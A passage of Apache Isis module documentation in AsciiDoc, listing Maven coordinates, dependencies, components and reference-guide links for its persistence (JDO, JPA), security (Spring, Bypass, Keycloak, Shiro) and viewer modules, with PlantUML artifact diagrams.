+\norg.eclipse.persistence:org.eclipse.persistence.moxy:jar:<managed> +\norg.eclipse.persistence:org.eclipse.persistence.sdo:jar:<managed> +\n****\n\n|Apache Isis Core - Schemas\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-schema\nType: jar\nDirectory: \/api\/schema\n----\n|Apache Isis schemas, for conversion into canonical DTOs (for use in integration scenarios).\n\n.Dependencies\n****\njoda-time:joda-time:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:schema:index\/IsisModuleSchema.adoc[IsisModuleSchema]\n****\n|===\n\n== Persistence\n\n=== JDO\n\n[plantuml,JDO,svg]\n----\n@startuml(id=JDO)\ntitle JDO - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JDO\\n[Software System]\" {\n rectangle \"==Apache Isis Persistence - JDO\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Persistence - JDO (Spring)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Persistence - JDO (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Persistence - JDO (integration)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Persistence - JDO (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Persistence - JDO (provider)\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Persistence - JDO Provider (DataNucleus)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n}\n2 .[#707070].> 8 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (JDO)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Persistence - JDO\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo\nType: pom\nDirectory: \/persistence\/jdo\n----\n|Supplementary applib for JDO persistence\n\n|Apache Isis Persistence - JDO (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-applib\nType: jar\nDirectory: \/persistence\/jdo\/applib\n----\n|Supplementary applib for JDO persistence\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.datanucleus:datanucleus-rdbms:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n.Document Index 
Entries\n****\nxref:refguide:persistence:index\/jdo\/applib\/IsisModulePersistenceJdoApplib.adoc[IsisModulePersistenceJdoApplib], xref:refguide:persistence:index\/jdo\/applib\/services\/JdoSupportService.adoc[JdoSupportService]\n****\n\n|Apache Isis Persistence - JDO Provider (DataNucleus)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-datanucleus\nType: jar\nDirectory: \/persistence\/jdo\/datanucleus\n----\n|JDO Implementation (powered by DataNucleus)\n\n.Components\n****\no.a.i.persistence.jdo.datanucleus.config.DnEntityDiscoveryListener +\no.a.i.persistence.jdo.datanucleus.entities.DnEntityStateProvider +\no.a.i.persistence.jdo.datanucleus.jdosupport.JdoSupportServiceDefault +\no.a.i.persistence.jdo.datanucleus.metamodel.JdoDataNucleusProgrammingModel +\n****\n\n.Dependencies\n****\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-integration:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-provider:jar:<managed> +\norg.datanucleus:datanucleus-api-jdo:jar:<managed> +\norg.datanucleus:datanucleus-core:jar:<managed> +\norg.datanucleus:datanucleus-jdo-query:jar:<managed> +\norg.datanucleus:datanucleus-jodatime:jar:<managed> +\norg.datanucleus:datanucleus-rdbms:jar:<managed> +\norg.springframework.boot:spring-boot-starter-jdbc:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:persistence:index\/jdo\/datanucleus\/IsisModuleJdoDatanucleus.adoc[IsisModuleJdoDatanucleus], xref:refguide:persistence:index\/jdo\/datanucleus\/changetracking\/JdoLifecycleListener.adoc[JdoLifecycleListener], xref:refguide:persistence:index\/jdo\/datanucleus\/dialect\/DnJdoDialect.adoc[DnJdoDialect], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_datanucleusIdLong.adoc[Persistable_datanucleusIdLong], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_datanucleusVersionLong.adoc[Persistable_datanucleusVersionLong], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_datanucleusVersionTimestamp.adoc[Persistable_datanucleusVersionTimestamp], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_downloadJdoMetadata.adoc[Persistable_downloadJdoMetadata], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisBookmarkConverter.adoc[IsisBookmarkConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisLocalResourcePathConverter.adoc[IsisLocalResourcePathConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisMarkupConverter.adoc[IsisMarkupConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisPasswordConverter.adoc[IsisPasswordConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/image\/JavaAwtBufferedImageByteArrayConverter.adoc[JavaAwtBufferedImageByteArrayConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisChangesDtoConverter.adoc[IsisChangesDtoConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisCommandDtoConverter.adoc[IsisCommandDtoConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisInteractionDtoConverter.adoc[IsisInteractionDtoConverter], 
xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisOidDtoConverter.adoc[IsisOidDtoConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/time\/IsoOffsetTimeConverter.adoc[IsoOffsetTimeConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/time\/IsoZonedDateTimeConverter.adoc[IsoZonedDateTimeConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/valuemappings\/applib\/ByteArrayBlobRdbmsMapping.adoc[ByteArrayBlobRdbmsMapping], xref:refguide:persistence:index\/jdo\/datanucleus\/valuetypes\/applib\/IsisBlobMapping.adoc[IsisBlobMapping], xref:refguide:persistence:index\/jdo\/datanucleus\/valuetypes\/applib\/IsisClobMapping.adoc[IsisClobMapping]\n****\n\n|Apache Isis Persistence - JDO (integration)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-integration\nType: jar\nDirectory: \/persistence\/jdo\/integration\n----\n|JDO Integration (powered by DataNucleus)\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-metamodel:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-spring:jar:<managed> +\n****\n\n|Apache Isis Persistence - JDO (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-metamodel\nType: jar\nDirectory: \/persistence\/jdo\/metamodel\n----\n|JDO Metamodel Facets \/ Programming Model\n\n.Components\n****\no.a.i.persistence.jdo.metamodel.JdoProgrammingModel +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-provider:jar:<managed> +\n****\n\n|Apache Isis Persistence - JDO (provider)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-provider\nType: jar\nDirectory: \/persistence\/jdo\/provider\n----\n|JDO Provider to be implemented by any actual JDO provider, e.g. DataNucleus.\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\n****\n\n|Apache Isis Persistence - JDO (Spring)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-spring\nType: jar\nDirectory: \/persistence\/jdo\/spring\n----\n|JDO Spring integration.\n\nThis is a fork of the Spring ORM JDO sources on GitHub,\nfor which support had been dropped back in 2016 [1].\n\nCredits to the original authors. 
See also docs [2].\n\n[1] https:\/\/github.com\/spring-projects\/spring-framework\/issues\/18702\n[2] https:\/\/docs.spring.io\/spring-framework\/docs\/3.0.0.RC2\/reference\/html\/ch13s04.html\n\n.Dependencies\n****\njavax.servlet:javax.servlet-api:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-provider:jar:<managed> +\norg.springframework:spring-jdbc:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\n****\n|===\n\n=== JPA\n\n[plantuml,JPA,svg]\n----\n@startuml(id=JPA)\ntitle JPA - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JPA\\n[Software System]\" {\n rectangle \"==Apache Isis Persistence - JPA\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Persistence - JPA (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Persistence - JPA (integration)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Persistence - JPA (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Persistence - JPA EclipseLink\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (JPA)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Persistence - JPA\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa\nType: pom\nDirectory: \/persistence\/jpa\n----\n|Apache Isis JPA integration\n\n|Apache Isis Persistence - JPA (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-applib\nType: jar\nDirectory: \/persistence\/jpa\/applib\n----\n|Supplementary applib for JPA persistence\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:persistence:index\/jpa\/applib\/integration\/JpaEntityInjectionPointResolver.adoc[JpaEntityInjectionPointResolver], xref:refguide:persistence:index\/jpa\/applib\/services\/JpaSupportService.adoc[JpaSupportService]\n****\n\n|Apache Isis Persistence - JPA EclipseLink\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-eclipselink\nType: jar\nDirectory: \/persistence\/jpa\/eclipselink\n----\n|EclipseLink integration. 
Sets up EclipseLink as the implementation provider for Spring Data JPA.\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-integration:jar:<managed> +\norg.eclipse.persistence:org.eclipse.persistence.jpa:jar:2.7.8 +\norg.springframework.boot:spring-boot-starter-data-jpa:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:persistence:index\/jpa\/eclipselink\/IsisModuleJpaEclipselink.adoc[IsisModuleJpaEclipselink]\n****\n\n|Apache Isis Persistence - JPA (integration)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-integration\nType: jar\nDirectory: \/persistence\/jpa\/integration\n----\n|JPA integration (facets, jpa-context)\n\n.Components\n****\no.a.i.persistence.jpa.integration.metamodel.JpaProgrammingModel +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-metamodel:jar:<managed> +\norg.springframework.data:spring-data-jpa:jar:<managed> +\n****\n\n|Apache Isis Persistence - JPA (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-metamodel\nType: jar\nDirectory: \/persistence\/jpa\/metamodel\n----\n|JPA Metamodel Facets \/ Programming Model\n\n.Components\n****\no.a.i.persistence.jpa.metamodel.JpaProgrammingModel +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\n****\n|===\n\n== Security\n\n[plantuml,Security,svg]\n----\n@startuml(id=Security)\ntitle Security - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Security\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Spring\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Security)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Spring\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-spring\nType: jar\nDirectory: \/security\/spring\n----\n|Authentication using Spring Security\n\n.Components\n****\no.a.i.security.spring.authentication.AuthenticatorSpring +\no.a.i.security.spring.webmodule.WebModuleSpringSecurity +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.springframework.boot:spring-boot-starter-security:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/spring\/IsisModuleSecuritySpring.adoc[IsisModuleSecuritySpring], xref:refguide:security:index\/spring\/authentication\/AuthenticatorSpring.adoc[AuthenticatorSpring], xref:refguide:security:index\/spring\/webmodule\/SpringSecurityFilter.adoc[SpringSecurityFilter], xref:refguide:security:index\/spring\/webmodule\/WebModuleSpringSecurity.adoc[WebModuleSpringSecurity]\n****\n|===\n\n=== 
Bypass\n\n[plantuml,Bypass,svg]\n----\n@startuml(id=Bypass)\ntitle Bypass - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Bypass\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Bypass\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Bypass)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Bypass\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-bypass\nType: jar\nDirectory: \/security\/bypass\n----\n|.Components\n****\no.a.i.security.bypass.authentication.AuthenticatorBypass +\no.a.i.security.bypass.authorization.AuthorizorBypass +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/bypass\/IsisModuleSecurityBypass.adoc[IsisModuleSecurityBypass], xref:refguide:security:index\/bypass\/authentication\/AuthenticatorBypass.adoc[AuthenticatorBypass], xref:refguide:security:index\/bypass\/authorization\/AuthorizorBypass.adoc[AuthorizorBypass]\n****\n|===\n\n=== Keycloak\n\n[plantuml,Keycloak,svg]\n----\n@startuml(id=Keycloak)\ntitle Keycloak - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Keycloak\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Keycloak\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Keycloak)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Keycloak\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-keycloak\nType: jar\nDirectory: \/security\/keycloak\n----\n|Authentication and Authorization using Keycloak\n\n.Components\n****\no.a.i.security.keycloak.authentication.AuthenticatorKeycloak +\no.a.i.security.keycloak.webmodule.WebModuleKeycloak +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/keycloak\/IsisModuleSecurityKeycloak.adoc[IsisModuleSecurityKeycloak], xref:refguide:security:index\/keycloak\/authentication\/AuthenticatorKeycloak.adoc[AuthenticatorKeycloak], xref:refguide:security:index\/keycloak\/webmodule\/KeycloakFilter.adoc[KeycloakFilter], xref:refguide:security:index\/keycloak\/webmodule\/WebModuleKeycloak.adoc[WebModuleKeycloak]\n****\n|===\n\n=== Shiro\n\n[plantuml,Shiro,svg]\n----\n@startuml(id=Shiro)\ntitle Shiro - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage 
\"Shiro\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Shiro\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Shiro)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Shiro\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-shiro\nType: jar\nDirectory: \/security\/shiro\n----\n|Authentication and Authorization using Apache Shiro.\n\n.Components\n****\no.a.i.security.shiro.authentication.AuthenticatorShiro +\no.a.i.security.shiro.authorization.AuthorizorShiro +\no.a.i.security.shiro.webmodule.WebModuleShiro +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.shiro:shiro-core:jar:<managed> +\norg.apache.shiro:shiro-web:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/shiro\/IsisModuleSecurityShiro.adoc[IsisModuleSecurityShiro], xref:refguide:security:index\/shiro\/authentication\/AuthenticatorShiro.adoc[AuthenticatorShiro], xref:refguide:security:index\/shiro\/authorization\/AuthorizorShiro.adoc[AuthorizorShiro], xref:refguide:security:index\/shiro\/authorization\/IsisPermission.adoc[IsisPermission], xref:refguide:security:index\/shiro\/authorization\/IsisPermissionResolver.adoc[IsisPermissionResolver], xref:refguide:security:index\/shiro\/webmodule\/WebModuleShiro.adoc[WebModuleShiro]\n****\n|===\n\n== Viewer\n\n[plantuml,Viewer,svg]\n----\n@startuml(id=Viewer)\ntitle Viewer - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Viewer\\n[Software System]\" {\n rectangle \"==Apache Isis Viewer - Common Model\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Viewer)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Viewer - Common Model\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-common\nType: jar\nDirectory: \/viewers\/common\n----\n|.Components\n****\no.a.i.viewer.common.model.branding.BrandingUiModelProvider +\no.a.i.viewer.common.model.header.HeaderUiModelProvider +\no.a.i.viewer.common.model.menu.MenuUiModelProvider +\no.a.i.viewer.common.model.userprofile.UserProfileUiModelProvider +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.webjars:font-awesome:jar:5.15.2 +\n****\n|===\n\n=== Restful Objects\n\n[plantuml,Restful Objects,svg]\n----\n@startuml(id=Restful_Objects)\ntitle Restful Objects - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor 
#2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Restful Objects\\n[Software System]\" {\n rectangle \"==Apache Isis Viewer - RO\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Viewer - RO (AppLib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Viewer - RO (JAX-RS Resteasy v4)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Viewer - RO (Rendering)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Viewer - RO (Testing)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Viewer - RO (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n@enduml\n----\n.Projects\/Modules (Restful Objects)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Viewer - RO\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects\nType: pom\nDirectory: \/viewers\/restfulobjects\n----\n|\n\n|Apache Isis Viewer - RO (AppLib)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-applib\nType: jar\nDirectory: \/viewers\/restfulobjects\/applib\n----\n|.Dependencies\n****\ncom.fasterxml.jackson.core:jackson-databind:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/applib\/IsisModuleViewerRestfulObjectsApplib.adoc[IsisModuleViewerRestfulObjectsApplib], xref:refguide:viewer:index\/restfulobjects\/applib\/JsonRepresentation.adoc[JsonRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/LinkRepresentation.adoc[LinkRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/Rel.adoc[Rel], xref:refguide:viewer:index\/restfulobjects\/applib\/RelDefinition.adoc[RelDefinition], xref:refguide:viewer:index\/restfulobjects\/applib\/RepresentationType.adoc[RepresentationType], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulHttpMethod.adoc[RestfulHttpMethod], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulMediaType.adoc[RestfulMediaType], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulRequest.adoc[RestfulRequest], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulResponse.adoc[RestfulResponse], xref:refguide:viewer:index\/restfulobjects\/applib\/boot\/BootstrapResource.adoc[BootstrapResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/AbstractObjectMemberRepresentation.adoc[AbstractObjectMemberRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ActionResultRepresentation.adoc[ActionResultRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainObjectMemberRepresentation.adoc[DomainObjectMemberRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainObjectRepresentation.adoc[DomainObjectRepresentation], 
xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainObjectResource.adoc[DomainObjectResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainRepresentation.adoc[DomainRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainServiceResource.adoc[DomainServiceResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ListRepresentation.adoc[ListRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ObjectActionRepresentation.adoc[ObjectActionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ObjectCollectionRepresentation.adoc[ObjectCollectionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ObjectPropertyRepresentation.adoc[ObjectPropertyRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ScalarValueRepresentation.adoc[ScalarValueRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/AbstractTypeMemberRepresentation.adoc[AbstractTypeMemberRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/ActionDescriptionRepresentation.adoc[ActionDescriptionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/ActionParameterDescriptionRepresentation.adoc[ActionParameterDescriptionRepresentation], 